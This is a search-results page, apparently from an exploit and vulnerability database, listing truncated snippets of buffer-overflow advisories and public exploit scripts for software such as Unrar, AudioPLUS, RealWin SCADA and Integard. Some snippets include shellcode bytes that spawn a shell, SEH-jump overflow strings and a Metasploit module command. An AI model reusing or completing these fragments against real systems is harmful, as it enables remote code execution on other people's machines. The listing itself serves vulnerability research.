116 matches found
The vulnerabilities of the Microsoft Office suite, including the Word Viewer program for reading doc files, the Office Compatibility Suite, and the Microsoft Word text editor, allow attackers to execute arbitrary code.
The vulnerabilities of the Microsoft Office suite, the Word Viewer program for reading doc files, the Office Compatibility Pack, and the Microsoft Word text editor are caused by buffer overflows. Exploitation of these vulnerabilities can allow an attacker to execute arbitrary code using a...
Sam Spade 1.14 - Crawl Website Buffer Overflow
Exploit Title : Sam Spade 1.14 - Buffer OverFlow Date : 10/30/2015 Exploit Author : MandawCoder Contact : [email protected] Vendor Homepage : http://samspade.org Software Link : http://www.majorgeeks.com/files/details/samspade.html Version : 1.14 Tested on : XP Professional SP3 En x86 Categor...
Ultra-Mini-HTTPD-1.21---POST
Exploit Title: Ultra Mini HTTPD stack buffer overflow POST request Date: 16 Feb 2014 Exploit Author: Sumit Vendor Homepage: http://www.picolix.jp/ Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Version: 1.21 Tested on: Windows XP Professional SP3 A buffer overflow is triggere...
MediaHouse Software Statistics Server LiveStats 5.2 - Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1568/info Mediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash o...
Unrar 3.9.3 - Local Stack Overflow Exploit
No description provided by source. #!/usr/bin/perl =head1 TITLE Winrar = v3.93 Local Stack-based Overflow exploit =head2 DESCRIPTION This script triggers a buffer overflow attack against Unrar, the popular Linux version of the WinRar extractor. It was not developed to bypass non-executing stack...
RM Downloader 3.0.2.1 (.asx) Local Buffer Overflow (SEH)
No description provided by source. #!/usr/bin/python Title: RM Downloader 3.0.2.1 .asx Local Buffer Overflow SEH Date: 03-29-2010 Author: b0telh0 Link: http://www.mini-stream.net/downloads/RMDownloader.exe Tested on: Windows XP SP3 windows/exec - 227 bytes EXITFUNC=process, CMD=calc.exe shellcode ...
Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/866/info Certain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distribut...
CVE-2013-1591
Stack-based buffer overflow in libpixman, as used in Pale Moon before 15.4 and possibly other products, has unspecified impact and context-dependent attack vectors. NOTE: this issue might be resultant from an integer overflow in the fast_composite_scaled_bilinear function in pixman-inlines.h, which...
AIX 5.3 TL 8 : libtt (IZ52845)
There is a buffer overflow vulnerability in the ToolTalk library libtt.a. A remote attacker can exploit this vulnerability when the rpc.ttdbserver is enabled in /etc/inetd.conf. The successful exploitation of this vulnerability allows a remote attacker to execute arbitrary code as the root user...
Unrar 3.9.3 - Local Stack Overflow
#!/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-' . '3lrvs' x 820; $pname = "/usr/bin/unrar"; die "-File...
RealWin SCADA Server DATAC Login Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.1 Build 6.0.10.10 or earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN packet containing a long username, an attacker may be able to execute arbitrary code. This module requires Metasploit...
BarCodeWiz ActiveX LoadProperties Buffer Overflow
Added: 05/23/2011 CVE: CVE-2010-2932 BID: 42097 OSVDB: 66882 Background BarCodeWiz Barcode ActiveX Control is a tool for generating barcodes in Microsoft Office documents, and for Visual Basic, Visual C++, VB.NET, C, or Delphi developer looking to include barcodes in programs. Problem The...
Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow
Exploit Title: Integard Pro 2.2.0.9026 Win7 ROP-Code Metasploit Module Date: 2010-09-15 Author: Node Software Link: http://www.exploit-db.com/application/14941 Version: Race River Integard Pro 2.2.0.9026, integard32.dll v.2.0.0.306 Tested on: Windows 7 x64 Eng CVE : - class Metasploit3 'Race River...
File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)
File Sharing Wizard 1.5.0 - Buffer Overflow PoC #!/usr/bin/python http://www.sharing-file.net/ File Sharing Wizard Version 1.5.0 build on 26-8-2008 controlling EAX ESP points to our buffer buffer grows if we increase our string more details on http://www.s3cur1ty.de have fun m1k3 at m1k3 dot at...
Debian DSA-2057-1 : mysql-dfsg-5.0 - several vulnerabilities
Several vulnerabilities have been discovered in the MySQL database server. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2010-1626 MySQL allows local users to delete the data and index files of another user's MyISAM table via a symlink attack in...
Webby WebServer - Overflow (SEH) (PoC)
#!/usr/bin/python POC details: SEH overwritten contact: [email protected] http://www.s3cur1ty.de App detail: http://www.shareware.de/webby-webserver/ Version 1.01 Author Timo Gaik License type Freeware Platforms Win XP, Win 98, Win ME Last update 19.10.2004 File size 701 KB import socket import sys...
Stack overflow
Stack-based buffer overflow in JetCast.exe 2.0.4.1109 in jetAudio 7.5.2 and 7.5.3.15 allows remote attackers to execute arbitrary code via a long ID3 tag in an MP3 file. NOTE: some of these details are obtained from third party information...
AudioPLUS 2.00.215 - .lst .m3u Local Buffer Overflow (SEH)
AudioPLUS 2.00.215 - .lst .m3u Local Buffer Overflow SEH #!/usr/bin/perl by hack4love [email protected] AudioPLUS 2.00.215 .m3u / .lst File Local buffer Overflow seh Greetz to all my friends from Egypt easy :d Tested on: Windows XP Pro SP2 EN my $bof="\x41" x 4116; my $nsh="\xEB\x06\x90\x90"; ...
32bit FTP (PASV) Reply Client Remote Overflow Exploit (meta)
Exploit for windows platform in category remote exploits. 32bit FTP PASV Reply Client Remote Overflow Exploit meta msf use exploit/windows/ftp/32bitftppasvreply msf...